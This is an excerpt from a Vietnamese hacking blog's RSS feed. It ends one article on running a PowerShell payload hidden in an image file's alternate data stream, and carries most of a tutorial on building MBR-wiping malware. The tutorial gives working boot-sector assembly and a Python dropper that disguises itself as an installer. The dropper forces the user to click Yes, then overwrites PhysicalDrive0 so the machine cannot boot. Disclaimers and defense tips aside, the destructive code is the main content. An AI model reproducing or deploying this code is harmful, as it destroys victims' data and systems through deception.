<figure id="attachment_49774" aria-describedby="caption-attachment-49774" style="width: 833px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2023/08/c.png" alt="Ẩn Virus vào hình ảnh" width="833" height="172" title="Hacker ẩn Malware vào hình ảnh và thực thi như thế nào ? 32"><figcaption id="caption-attachment-49774" class="wp-caption-text">Đính kèm Virus vào hình ảnh</figcaption></figure>
<p>Như vậy các bạn có thể thấy &#8220;calc.exe&#8221; đã được in ra màn hình. Vậy làm cách nào để thực thi &#8220;calc.exe&#8221;, và đây là cách mình đã làm:</p>
<p><code>powershell -c "$opencalc = Get-Content .\anonyviet.jpg -Stream payload; Invoke-Expression $opencalc"</code></p>
<p>Mình đã gán một biến có tên <code>$opencalc</code>sau đó mình dùng lệnh <code>Invoke-Expression $opencalc</code>. Đây là câu lệnh PowerShell sử dụng cmdlet &#8220;Invoke-Expression&#8221; để thực thi dữ liệu được lưu trữ trong biến <code>$opencalc</code> như một câu lệnh PowerShell. Tức là nội dung đọc từ luồng &#8220;payload&#8221; trong tệp tin &#8220;anonyviet.jpg&#8221; sẽ được thực thi như một mã lệnh PowerShell</p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2023/08/d.png" alt="Thực thi Virus trong hình ảnh" width="1218" height="122" title="Hacker ẩn Malware vào hình ảnh và thực thi như thế nào ? 33"></p>
<div style="width: 1364px;" class="wp-video"><!--[if lt IE 9]><script>document.createElement('video');</script><![endif]--><br />
<video class="wp-video-shortcode" id="video-49771-1" width="1364" height="736" autoplay preload="metadata" controls="controls"><source type="video/mp4" src="https://anonyviet.com/wp-content/uploads/2023/08/OpenCalc.mp4?_=1" /><a href="https://anonyviet.com/wp-content/uploads/2023/08/OpenCalc.mp4">https://anonyviet.com/wp-content/uploads/2023/08/OpenCalc.mp4</a></video></div>
<p>Như vậy các bạn có thể thấy &#8220;calc.exe&#8221; đã được thực thi thông qua hình ảnh. Và để thực tế hơn nữa, mình sẽ demo lại thực thi mã độc bằng hình ảnh + Bypass Antivirus. Mời các bạn xem video bên dưới:</p>
<p><iframe loading="lazy" class="wp-embedded-content" sandbox="allow-scripts" security="restricted" title="MeterBypass" src="https://streamable.com/o/1drxnz#?secret=IptkLLQJjS" data-secret="IptkLLQJjS" frameborder="0" scrolling="no" width="1279" height="720"></iframe></p>
<h2><span style="font-size: 14pt; color: #0000ff;"><strong>Dưới đây là một số cách phòng chống Hacker ẩn Virus vào hình ảnh</strong></span>:</h2>
<ol>
<li><strong>Giới hạn quyền truy cập vào PowerShell:</strong> Đảm bảo rằng người dùng cuối không có quyền truy cập vào PowerShell hoặc giới hạn quyền sử dụng PowerShell cho các người dùng chỉ cần sử dụng nó trong mục đích công việc cụ thể</li>
<li><strong>Kiểm tra và cập nhật hệ thống:</strong> Đảm bảo hệ điều hành và phần mềm trên máy tính luôn được cập nhật bản vá bảo mật mới nhất. Các bản vá này giúp bảo vệ khỏi các lỗ hổng bảo mật mà hacker có thể tận dụng</li>
<li><strong>Chỉ cài đặt phần mềm đáng tin cậy:</strong> Đảm bảo rằng chỉ cài đặt và sử dụng các ứng dụng và phần mềm đáng tin cậy từ các nguồn có nguồn gốc xác thực. Tránh tải xuống và chạy các phần mềm từ nguồn không rõ nguồn gốc</li>
<li><strong>Sử dụng phần mềm chống mã độc:</strong> Cài đặt và duy trì một phần mềm diệt virus và phần mềm chống Virus hiệu quả để ngăn chặn các cuộc tấn công từ mã độc và phần mềm độc hại</li>
<li><strong>Quản lý tường lửa và quyền hạn:</strong> Thiết lập tường lửa để kiểm soát các kết nối đến và ra khỏi hệ thống và hạn chế quyền hạn của người dùng, đặc biệt là đối với các tài khoản quản trị viên</li>
<li><strong>Kiểm tra dữ liệu đầu vào:</strong> Trong ứng dụng của bạn, hãy kiểm tra và xác thực dữ liệu đầu vào của người dùng để tránh các cuộc tấn công thông qua các kỹ thuật nhập liệu không an toàn</li>
<li><strong>Tạo sao lưu định kỳ:</strong> Đảm bảo sao lưu dữ liệu thường xuyên và lưu trữ nó ở một nơi an toàn để đảm bảo rằng bạn có khả năng khôi phục lại dữ liệu trong trường hợp bị Virus tấn công</li>
<li><strong>Đào tạo người dùng:</strong> Tăng cường khả năng nhận diện các cuộc tấn công từ Virus và tư duy bảo mật cho người dùng của bạn để họ hiểu và phòng chống các mối nguy hiểm tiềm tàng</li>
<li><strong>Kiểm tra các tệp tin hình ảnh và luồng dữ liệu:</strong> Sử dụng phần mềm chống mã độc để quét các tệp hình ảnh và các luồng dữ liệu trong các tệp tin để phát hiện và ngăn chặn các mã độc có thể ẩn trong hình ảnh</li>
</ol>
<p>Như vậy mình đã demo lại cách mà hacker thực thi Virus thông qua hình ảnh. Mình thấy đây là một thủ thuật tinh vi và nguy hiểm có khả năng phát tán mã độc rất cao. Chúng ta đã khám phá cách mà hình ảnh có thể được sử dụng như một vũ khí trong tay của hacker để xâm nhập vào hệ thống và lây nhiễm các phần mềm độc hại vào máy tính của chúng ta. Từ việc giấu Virus vào hình ảnh cho đến việc thực thi Virus thông qua các luồng dữ liệu, các chiến thuật này đòi hỏi chúng ta phải tăng cường nhận thức và thực hiện các biện pháp phòng ngừa mạnh mẽ. Việc bảo mật thông tin và dữ liệu trong thời đại công nghệ số là một thách thức không hề nhỏ. Để bảo vệ bản thân trước những cuộc tấn công Virus thông qua hình ảnh, chúng ta cần kết hợp sự cảnh giác, kiến thức về các chiến thuật tấn công, và việc sử dụng các công cụ bảo mật đáng tin cậy. Việc duy trì hệ thống và phần mềm cập nhật thường xuyên, cùng việc hạn chế quyền truy cập và giám sát hoạt động mạng cũng là những yếu tố quan trọng để đảm bảo an toàn.</p>
<p><em><strong>Bạn cũng có thể đọc thêm bài viết <a href="https://anonyviet.com/khai-thac-lo-hong-winrar-de-phat-tan-ma-doc-tren-windows/">Khai thác lỗ hổng WinRAR để phát tán mã độc trên Windows </a></strong></em></p>
<h2>Câu hỏi thường gặp</h2>
<h3>Làm thế nào hacker có thể ẩn mã độc trong hình ảnh?</h3>
<p>Hacker có thể sử dụng các kỹ thuật như nhúng dữ liệu vào luồng dữ liệu ẩn của file ảnh (ví dụ: sử dụng &#8220;anonyviet.jpg:payload&#8221;).  Mã độc này sau đó có thể được trích xuất và thực thi bằng các lệnh như PowerShell.</p>
<h3>Tôi có thể phát hiện mã độc ẩn trong hình ảnh như thế nào?</h3>
<p>Bạn có thể sử dụng các lệnh như <code>powershell -c "Get-Content .\anonyviet.jpg -Stream payload"</code> để kiểm tra xem có dữ liệu ẩn trong luồng &#8220;payload&#8221; của file ảnh hay không. Tuy nhiên, điều này đòi hỏi kiến thức kỹ thuật nhất định.</p>
<h3>Làm thế nào để bảo vệ bản thân khỏi nguy cơ này?</h3>
<p>Hãy cập nhật phần mềm diệt virus thường xuyên, chỉ tải xuống hình ảnh từ các nguồn đáng tin cậy và hạn chế quyền truy cập vào các công cụ mạnh mẽ như PowerShell nếu không cần thiết.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/hacker-an-malware-vao-hinh-anh-va-thuc-thi-nhu-the-nao/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		<enclosure url="https://anonyviet.com/wp-content/uploads/2023/08/OpenCalc.mp4" length="303601" type="video/mp4" />
<enclosure url="https://anonyviet.com/wp-content/uploads/2023/08/OpenCalc.mp4?_=1" length="303601" type="video/mp4" />

			</item>
		<item>
		<title>Code phá hủy MBR ổ cứng &#8211; Tấn công và phòng chống</title>
		<link>https://anonyviet.com/code-pha-huy-mbr-o-cung-tan-cong-va-phong-chong/</link>
					<comments>https://anonyviet.com/code-pha-huy-mbr-o-cung-tan-cong-va-phong-chong/#comments</comments>
		
		<dc:creator><![CDATA[Hevin]]></dc:creator>
		<pubDate>Sun, 19 Feb 2023 07:31:12 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[Boot]]></category>
		<category><![CDATA[hdd]]></category>
		<category><![CDATA[mã độc]]></category>
		<category><![CDATA[mbr]]></category>
		<category><![CDATA[ổ cứng]]></category>
		<category><![CDATA[ssd]]></category>
		<category><![CDATA[virus]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=45229</guid>

					<description><![CDATA[Đây là một chủ đề &#8220;khá nhạy cảm&#8221; và &#8220;nguy hiểm&#8221; và mình muốn khẳng định rằng mình không khuyến khích hoặc ủng hộ việc viết mã độc hoặc bất kỳ hành vi vi phạm pháp luật nào. Tuy nhiên, để hiểu được cách thức hoạt động của mã độc và bảo vệ chính mình [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Đây là một chủ đề &#8220;khá nhạy cảm&#8221; và &#8220;nguy hiểm&#8221; và mình muốn khẳng định rằng mình không khuyến khích hoặc ủng hộ việc viết mã độc hoặc bất kỳ hành vi vi phạm pháp luật nào. Tuy nhiên, để hiểu được cách thức hoạt động của mã độc và bảo vệ chính mình khỏi nó, mình đã tìm hiểu về nó. Trong bài viết này, mình sẽ chia sẻ với bạn về cách mà mình đã tạo ra một đoạn mã độc và sử dụng nó để phá huỷ dữ liệu trên ổ cứng chỉ với 1 tập lệnh Python.</strong></p>
<p><strong>An0nyviet hy vọng rằng bài viết này sẽ giúp bạn hiểu rõ hơn về cách thức hoạt động của mã độc và cách bảo vệ chính mình khỏi nó. Mình sẽ chia sẻ cách tạo ra một phần mềm độc hại MBR. Trước khi vào vấn đề đó mình sẽ nói qua khái niệm về MBR và cách hoạt động của nó.</strong></p>
<p style="text-align: center;"><span style="color: #ff0000;"><strong>Lưu ý: Bài viết chỉ mang tính chất giáo dục, nghiên cứu về mã độc, vui lòng không thực hiện các cuộc tấn công phạm pháp nào. Anonyviet không chịu toàn bộ trách nhiệm mà bạn đã gây ra !</strong></span></p>
<h2><span style="font-size: 18pt; color: #0000ff;"><strong>MBR là gì ? Cách hoạt động của MBR</strong></span></h2>
<p><strong>MBR</strong> ( <strong>Master Boot Record</strong>: <em><strong>Bản ghi khởi động chính </strong></em>), là một phần của đĩa cứng được sử dụng để khởi động hệ thống máy tính. Nó là một khối dữ liệu 512 byte đầu tiên trên ổ đĩa cứng được sử dụng để lưu trữ thông tin về cách phân vùng đĩa cứng và cách khởi động hệ thống. Trong MBR, có một bảng phân vùng chứa thông tin về các phân vùng trên đĩa cứng, bao gồm địa chỉ bắt đầu và kích thước của mỗi phân vùng. Nó cũng chứa mã khởi động ( <strong>bootloader</strong> ) để hệ thống có thể khởi động từ ổ đĩa cứng. Ngoài ra nó còn chứa một chữ ký ( <strong>signature </strong>) với kích cỡ 2 byte ở cuối để xác nhận rằng nó là MBR hợp lệ và giúp hệ điều hành nhận diện đĩa cứng. Tuy nhiên, MBR cũng là điểm yếu của hệ thống bởi vì nó có thể bị tấn công bởi mã độc và phá hỏng thông tin về phân vùng và cách khởi động hệ thống, gây ra các vấn đề nghiêm trọng khi khởi động hệ thống.</p>
<p><strong>Cách hoạt động của MBR:</strong> Khi hệ thống được bật, trình điều khiển BIOS (<strong>Basic Input/Output System</strong>) sẽ đọc MBR từ ổ đĩa cứng và tải nó vào bộ nhớ. Mã khởi động (bootloader) trong MBR sẽ được thực thi, cho phép hệ thống khởi động từ ổ đĩa cứng. Sau đó, Bootloader sẽ tải phần mềm khởi động tiếp theo (như <a href="https://vi.wikipedia.org/wiki/GRUB" target="_blank" rel="noopener">GRUB</a> hoặc <a href="https://vi.wikipedia.org/wiki/NTLDR" target="_blank" rel="noopener">NTLDR</a>) và cho phép người dùng chọn hệ điều hành để khởi động. Nếu không có lựa chọn, bootloader sẽ tiếp tục thực thi và chuyển quyền điều khiển cho hệ điều hành. Nếu MBR bị hỏng hoặc bị tấn công bởi mã độc, bootloader có thể không thể được tải hoặc hệ thống sẽ không khởi động được. Trong trường hợp này, bạn cần phải sử dụng các công cụ phục hồi hệ thống để sửa chữa hoặc khôi phục lại MBR để đảm bảo hệ thống có thể khởi động được lại.</p>
<h2><span style="color: #0000ff; font-size: 18pt;"><strong>Mình đã tạo ra mã độc MBR phá hủy ổ cứng như thế nào ?</strong></span></h2>
<p>Để tạo ra được mã độc này, An0nyViet đã tìm hiểu những kiến thức sau:</p>
<ul>
<li><strong><em>Ngôn ngữ lập trình</em> <em>Assembler</em></strong>: đây là một ngôn ngữ lập trình gần với ngôn ngữ máy và cung cấp một phương tiện để lập trình trực tiếp các lệnh máy tính. Nó cung cấp các lệnh khá đơn giản về việc thực hiện các tác vụ cơ bản như tính toán, lưu trữ và điều khiển và mình thường thấy các lập trình viên dùng ngôn ngữ này để viết ra các phần mềm yêu cầu xử lý tốc độ nhanh</li>
<li><em><strong>Qemu</strong></em>: là chương trình mô phỏng hệ thống (System Emulator) miễn phí và mã nguồn mở, cho phép người dùng chạy các hệ điều hành và phần mềm trong một môi trường ảo trên các nền tảng khác nhau. Nó mô phỏng một loạt các kiến trúc máy tính bao gồm các CPU phổ biến như x86, ARM, PowerPC, SPARC, và MIPS, cũng như các hệ điều hành như MacOS, Windows, và Linux</li>
<li><em><strong>Netwide Assembler</strong></em>:  viết tắt là &#8220;NASM&#8221; là một trình dịch ngược mã (<strong>Assembler</strong>) mã nguồn mở, được sử dụng để chuyển đổi mã assembly (ngôn ngữ lập trình gần với ngôn ngữ máy như mình đã nói ở trên) thành mã máy. NASM hỗ trợ nhiều kiến trúc máy tính, bao gồm các kiến trúc phổ biến như x86 và x86-64 (bao gồm cả 32-bit và 64-bit), ARM, PowerPC,&#8230;. Nó được sử dụng trong nhiều dự án phần mềm mã nguồn mở, bao gồm các hệ điều hành như Linux và FreeBSD, và các công cụ và ứng dụng như bootloader và các ứng dụng mã hóa.</li>
<li><em><strong>Ngôn ngữ lập trình Python</strong></em>: Đây là một ngôn ngữ lập trình khá nhiều anh em được biết và được học rồi nhỉ, được biết Python nổi tiếng về cú pháp đơn giản, dễ đọc, dễ hiểu, và dễ học. Hiện tại Python đang được phát triển và được dạy trong chương trình THPT. Python là ngôn ngữ lập trình thông dịch, được sử dụng rộng rãi trong nhiều lĩnh vực khác nhau.  Và đó cũng là lí do mình lựa chọn Python để viết ra mã độc MBR nhằm dễ đọc và dễ hiểu hơn</li>
</ul>
<p>Trước tiên mình download <a href="https://qemu.weilnetz.de/w64/" target="_blank" rel="noopener">Qemu Binaries</a> và <a href="https://www.nasm.us/pub/nasm/releasebuilds/2.16.01/" target="_blank" rel="noopener">NASM</a>. Việc cài đặt 2 phần mềm này khá đơn giản nên mình sẽ bỏ qua nhé. Bây giờ mình sẽ tiến hành tạo một tên tệp với bản định dạng của ngôn ngữ Assembler là .asm. Mình đặt tên file là <strong>boot.asm</strong> nhé</p>
<h3><span style="font-size: 14pt;"><strong><span style="color: #008000;">Bước 1: Tạo tệp boot.asm và biên dịch sang mã hex độc</span></strong></span></h3>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2023/02/carbon.png" alt="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 21" width="1364" height="1242" title="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 44"></p>
<pre class="EnlighterJSRAW" data-enlighter-language="asm">org 0x7c00 
bits 16    


start:
    call cls 
    mov bx, display

print:
    mov al, [bx]
    cmp al, 0 
    je halt
    call print_char 
    inc bx
    jmp print 

print_char:
    mov ah, 0x0e
    int 0x10 
    ret 

halt:
    ret


cls:
    mov ah, 0x07   
    mov al, 0x00  
    mov bh, 0x02
    mov cx, 0x00  
    mov dx, 0x184f
    int 0x10       
    ret            

display db "We are Anonyviet.com, I am Hevin", 13, 10, "You have been hacked !", 13, 10, 0
times 510 - ($ - $$) db 0
dw 0xaa55 
</pre>
<p><strong>Đoạn code trên là một chương trình boot loader, được tạo ra để chạy trên một máy tính x86 sau khi khởi động. Bây giờ chúng mình hãy cùng đi vào từng đoạn code để hiểu rõ hơn nha:</strong></p>
<p>Dòng đầu tiên <code>org 0x7c00</code> chỉ định vị trí lưu trữ của chương trình khi nó được nạp vào bộ nhớ, và địa chỉ này được xác định là <code>0x7c00</code>. Dòng thứ 2 chính là <code>bits 16</code> chỉ định rằng chương trình này sẽ được biên dịch và chạy trên kiến trúc 16Bit</p>
<pre class="EnlighterJSRAW" data-enlighter-language="asm">org 0x7c00
bits 16</pre>
<p>Chương trình bắt đầu bằng nhãn <code>start</code> và thực hiện các lệnh. Lệnh đầu tiên gọi hàm <code>cls</code> để xóa màn hình. Lệnh thứ hai đưa địa chỉ của chuỗi <code>display</code> vào thanh ghi <code>bx</code></p>
<pre class="EnlighterJSRAW" data-enlighter-language="asm">start:
     call cls
     mov bx, display</pre>
<p>Đoạn mã này lặp lại cho đến khi kết thúc chuỗi <code>display</code>. Mỗi lần lặp lại, nó đọc một ký tự từ chuỗi <code>display</code> và gọi hàm <code>print_char</code> để in ký tự đó ra màn hình. Sau đó, nó tăng giá trị của thanh ghi <code>bx</code> để trỏ đến ký tự tiếp theo trong chuỗi <code>display</code> và lặp lại quá trình này.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="asm">print:
     mov al, [bx]
     cmp al, 0
     je halt
     call print_char
     inc bx
     jmp print</pre>
<p>Hàm <code>print_char</code> đặt giá trị <code>0x0e</code> vào thanh ghi <code>ah</code>, sau đó gọi trình ngắt <code>0x10</code> để hiển thị ký tự tương ứng với thanh ghi <code>al</code> lên màn hình. Tiếp đến, nó sẽ trả về ngay lập tức.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="asm">print_char:
     mov ah, 0x0e
     int 0x10
     ret</pre>
<p>Hàm <code>halt</code> chỉ đơn giản là trả về ngay lập tức.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="asm">halt:
     ret</pre>
<p><code>cls</code> là một hàm để xóa màn hình<br />
<code>mov ah, 0x07</code>: Di chuyển giá trị <code>0x07</code> vào thanh ghi <code>ah</code>, là mã hàm ẩn bảng ký tự của BIOS để xoá màn hình.<br />
<code>mov al, 0x00</code>: Di chuyển giá trị <code>0x00</code> vào thanh ghi <code>al</code>, là thông số mặc định để xoá màn hình.<br />
<code>mov bh, 0x02</code>: Di chuyển giá trị <code>0x02</code> vào thanh ghi <code>bh,</code> là mã màu sắc của ký tự trên màn hình console.Trong trường hợp này, màu sắc được chọn là màu xanh lá cây được biểu thị bằng mã nhị phân. Bạn có thể xem các danh sách màu chữ của BIOS <a href="https://en.wikipedia.org/wiki/BIOS_color_attributes" target="_blank" rel="noopener">tại đây</a><br />
<code>mov cx, 0x00</code>: Di chuyển giá trị <code>0x00</code> vào thanh ghi <code>cx</code>, là số lần hiển thị để xoá màn hình.<br />
<code>mov dx, 0x184f</code>: Di chuyển giá trị <code>0x184f</code> vào thanh ghi <code>dx</code>, là tọa độ bắt đầu xoá màn hình với x = 0 và y =0<br />
<code>int 0x10</code>: Gọi hàm ngắt số <code>0x10</code>, là hàm giao tiếp với phần cứng video của máy tính.<br />
<code>ret</code>: Trả về hàm và quay trở lại nơi gọi hàm.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="asm">cls:
     mov ah, 0x07
     mov al, 0x00
     mov bh, 0x02
     mov cx, 0x00
     mov dx, 0x184f
     int 0x10
     ret</pre>
<p><code>display</code> là tên biến, <code>db</code> là instruction để định nghĩa một chuỗi byte.<br />
Chuỗi được định nghĩa bao gồm: <code>"We are Anonyviet.com, I am Hevin", 13, 10, "You have been hacked !", 13, 10, 0</code> và bạn cũng có thể thay đổi lời nhắn tùy ý nhé !</p>
<p>Ở đây <code>"We are Anonyviet.com, I am Hevin"</code> là một chuỗi ký tự, trong trường hợp này là thông điệp được hiển thị trên màn hình</p>
<p>Còn <code>13</code> và <code>10</code> lần lượt là các ký tự ASCII tương ứng với các ký tự xuống dòng và lùi về đầu dòng (Carriage Return và Line Feed).<br />
<code>"You have been hacked !"</code> là thông điệp tiếp theo được hiển thị trên màn hình. <code>0</code> là ký tự kết thúc chuỗi.<br />
<code>times 510 - ($ - $$) db 0</code> sử dụng lệnh <code>times</code> để bổ sung các byte giá trị 0 vào phần còn thiếu của boot sector (tính từ đầu cho tới vị trí 510).<br />
<code>dw 0xaa55</code> giá trị kết thúc của boot sector là <code>0xAA55</code>, giá trị này sẽ được BIOS sử dụng để kiểm tra tính hợp lệ của boot sector trước khi nạp vào bộ nhớ và thực thi</p>
<pre class="EnlighterJSRAW" data-enlighter-language="asm">display db "We are Anonyviet.com, I am Hevin", 13, 10, "You have been hacked !", 13, 10, 0
times 510 - ($ - $$) db 0
dw 0xaa55</pre>
<h4><code></code><strong>Cách hoạt động của chương trình phá hủy MBR ổ cứng trên như sau:</strong></h4>
<p>Trước tiên, nó sử dụng lệnh <code>org 0x7c00</code> để xác định địa chỉ bắt đầu của chương trình, tức là địa chỉ <code>0x7c00</code>. Tiếp đến sử dụng <code>bits 16</code> để chỉ định kiểu bit được sử dụng.</p>
<p>Sau đó, chương trình chạy đến nhãn <code>start</code> và gọi hàm <code>cls</code> để xóa màn hình và di chuyển con trỏ về địa chỉ đầu tiên của chuỗi <code>display</code> bằng cách di chuyển địa chỉ của chuỗi vào thanh ghi <code>bx</code></p>
<p>Tiếp theo, chương trình sử dụng một vòng lặp để in từng ký tự trong chuỗi <code>display</code> bằng cách gọi hàm <code>print_char</code>. Nếu ký tự là ký tự null (0), vòng lặp sẽ dừng lại và chương trình sẽ gọi hàm <code>halt</code> để kết thúc chương trình. Nếu không, con trỏ sẽ được di chuyển sang ký tự tiếp theo trong chuỗi bằng cách tăng giá trị của thanh ghi <code>bx</code> và chương trình sẽ tiếp tục in ký tự tiếp theo.</p>
<p>Hàm <code>print_char</code> sử dụng lệnh <code>int 0x10</code> để gọi dịch vụ hệ thống của BIOS để in một ký tự lên màn hình. Trong hàm này, chương trình truyền giá trị của thanh ghi <code>al</code> vào thanh ghi <code>ah</code> và sau đó gọi lệnh <code>int 0x10</code> để in ký tự lên màn hình.</p>
<p>Hàm <code>cls</code> cũng sử dụng lệnh <code>int 0x10</code> để gọi dịch vụ hệ thống của BIOS để xóa màn hình. Trong hàm này, chương trình thiết lập các thanh ghi để định dạng của việc xóa màn hình và sau đó gọi lệnh <code>int 0x10</code> để xóa màn hình.</p>
<p>Cuối cùng, chương trình kết thúc bằng hai câu lệnh với  <code>times 510 - ($ - $$) db 0</code> được sử dụng để đảm bảo rằng kích thước của chương trình sẽ là chính xác 512 byte và <code>dw 0xaa55 </code>được sử dụng để đánh dấu kí tự cuối của một sector bootable.</p>
<h4><strong>Để biên dịch được sang mã hex độc và thực thi nó mình đã làm như sau:</strong></h4>
<p>Giờ mình sẽ boot thử vào <strong>boot.bin</strong> bằng qemu binaries xem có được không nhé ! OK. Vậy là được rồi. Đầu tiên mình sẽ sử dụng NASM để biên dịch <strong>boot.asm</strong> sang <strong>boot.bin</strong> sau đó mình sẽ vào website <a href="http://tomeko.net/online_tools/file_to_hex.php?lang=en" target="_blank" rel="noopener">tomeko.net</a> để chuyển file <strong>boot.bin</strong> sang mã hex độc hại tiếp đến mình chỉ vệc copy lại</p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-26.png" alt="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 22" width="1280" height="628" title="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 45"></p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-20.png" alt="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 23" width="1109" height="612" title="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 46"></p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-22.png" alt="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 24" width="1145" height="708" title="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 47"></p>
<p>Ngoài ra bạn có thể sử dụng một đoạn script Python nhỏ của mình để chuyển file bin sang dạng mã hex nhé. Nếu bạn có tên file khác boot.bin bạn chỉ cần sửa ở dòng 3 sau đó chạy script, nó sẽ cấp cho bạn 1 đoạn mã hex giống như bên dưới</p>
<pre class="EnlighterJSRAW" data-enlighter-language="python">import binascii

with open("boot.bin", "rb") as f:
    binary_data = f.read()
hex_values = ["0x{:02X}".format(byte) for byte in binary_data]
print(hex_values)

hex_string = ", ".join(hex_values)
print(hex_string)
</pre>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2023/02/Screenshot-24.png" alt="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 25" width="1111" height="615" title="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 48"></p>
<h3><span style="font-size: 14pt; color: #008000;"><strong>Bước 2: Đính kèm mã hex độc và biên dịch sang EXE</strong></span></h3>
<p>Đầu tiên mình sẽ viết ra 1 đoạn code Python ngắn gọn với module <a href="https://pypi.org/project/pywin32/" target="_blank" rel="noopener">Pywin32</a> việc cài đặt module đó cũng khá đơn giản, bạn chỉ cần mở CMD trên máy sau đó chạy đoạn lệnh <code>pip install pywin32</code>.Với module này giúp mình làm việc với các tài nguyên Windows như các tệp, thư mục, tiến trình, ứng dụng, COM objects, registry, service,&#8230;Không chỉ vậy, nó còn thực hiện các tác vụ liên quan đến Windows, bao gồm cả việc sử dụng các API của Windows thông qua các đối tượng Python. Mình sẽ gọi các module con của Pywin32 bao gồm <strong>win32file, win32api, win32gui, win32ui và win32con</strong> và import tất cả những gì của module vào. Còn module time mình dùng để &#8220;thao túng tâm lý&#8221; nạn nhân thôi :&gt;</p>
<p>Và bạn chỉ cần copy đoạn mã hex lúc nãy mà bạn đã tạo được và paste nó vào bến <strong>ma_doc</strong> như hình bên dưới</p>
<pre class="EnlighterJSRAW" data-enlighter-language="python">from win32file import * 
from win32api import *  
from win32gui import *  
from win32con import *  
from win32ui import *  
from time import sleep

ma_doc = bytes([
     # paste đoạn code dữ liệu hex tại đây

])
</pre>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2023/02/carbon2.png" alt="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 26" width="1361" height="1595" title="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 49"></p>
<p>Sau khi đã copy mã độc vào biến ma_doc, chúng ta sẽ tạo 1 hàm tên là <strong>run_mbr()</strong> bao gồm các nội dung sau:</p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2023/02/carbon3.png" alt="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 27" width="1536" height="797" title="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 50"></p>
<pre class="EnlighterJSRAW" data-enlighter-language="python">def run_mbr():
    while MessageBox('Bấm "Yes để tiếp tục cài đặt" ', 'Anonyviet',MB_YESNO) == IDNO:
            continue
    sleep(3)
    if MessageBox('Đã cài đặt hoàn tất \nVui lòng khởi động lại máy để phần mềm được làm mới !', "Anonyviet"):
        pass

    anonyviet = CreateFileW(r"\\.\PhysicalDrive0", 
                          GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 
                          None, OPEN_EXISTING, 0, 0)

    WriteFile(anonyviet, ma_doc, None)
    CloseHandle(anonyviet)

run_mbr()</pre>
<p>&nbsp;</p>
<p>Một vòng lặp while vô hạn được bắt đầu. Trong vòng lặp này, một hộp thoại <strong>MessageBox</strong> sẽ xuất hiện với một thông điệp yêu cầu người dùng bấm Yes hoặc No để tiếp tục cài đặt. Nếu người dùng bấm No, vòng lặp sẽ tiếp tục chạy và hộp thoại sẽ xuất hiện lại ( Và đây là kiểu ép buộc người dùng phải chọn Yes ), Nếu người dùng bấm Yes, vòng lặp sẽ kết thúc. Sau đó, chương trình sẽ dừng nghỉ trong 3 giây bằng hàm <code>sleep(3)</code> để đợi người dùng có thể đọc thông báo hoàn tất. Tiếp theo, một hộp thoại MessageBox khác xuất hiện với thông điệp yêu cầu người dùng khởi động lại máy tính để phần mềm được cập nhật. Nếu người dùng nhấn OK, chương trình sẽ tiếp tục thực thi bước tiếp theo. Với chuỗi đầu tiên trong MessageBox đó là <code>Bấm "Yes" để tiếp tục cài đặt</code> Đây là chuỗi hiện lên thông báo văn bản trên hộp thoại, tiếp đến đó là chuỗi <code>'Anonyviet'</code> đây là chuỗi hiện thị tên hộp thoại và cuối cùng đó là <code>MB_YESNO</code> đây là một phương thức gọi hộp thoại YES NO của <strong>win32gui</strong></p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2023/02/carbon-1.png" alt="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 28" width="1986" height="518" title="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 51"></p>
<p>&nbsp;</p>
<p>Tiếp đến là mở một tập tin được gọi là \\.\PhysicalDrive0, là tệp tương ứng với ổ đĩa vật lý đầu tiên trên hệ thống. Điều này cho phép chương trình ghi một số dữ liệu lên phần MBR (Master Boot Record) của ổ đĩa. Dòng code bên dưới tạo một file handle (một đối tượng để truy cập file) cho thiết bị ổ đĩa vật lý đầu tiên (PhysicalDrive0) bằng cách sử dụng hàm CreateFileW của Windows API. Tham số <code>GENERIC_WRITE</code> chỉ định rằng file handle này sẽ được sử dụng để ghi dữ liệu vào ổ đĩa. Tham số <code>FILE_SHARE_READ</code> và <code>FILE_SHARE_WRITE</code> cho phép các tiến trình khác có thể đọc và ghi vào thiết bị. Tham số <code>None</code> chỉ định rằng không có thuộc tính bảo mật nào được sử dụng cho file handle. Tham số <code>OPEN_EXISTING</code> chỉ định rằng file handle được tạo sẽ trỏ tới một file đã tồn tại. Tham số cuối cùng là các flag khác và ở đây được đặt là 0.</p>
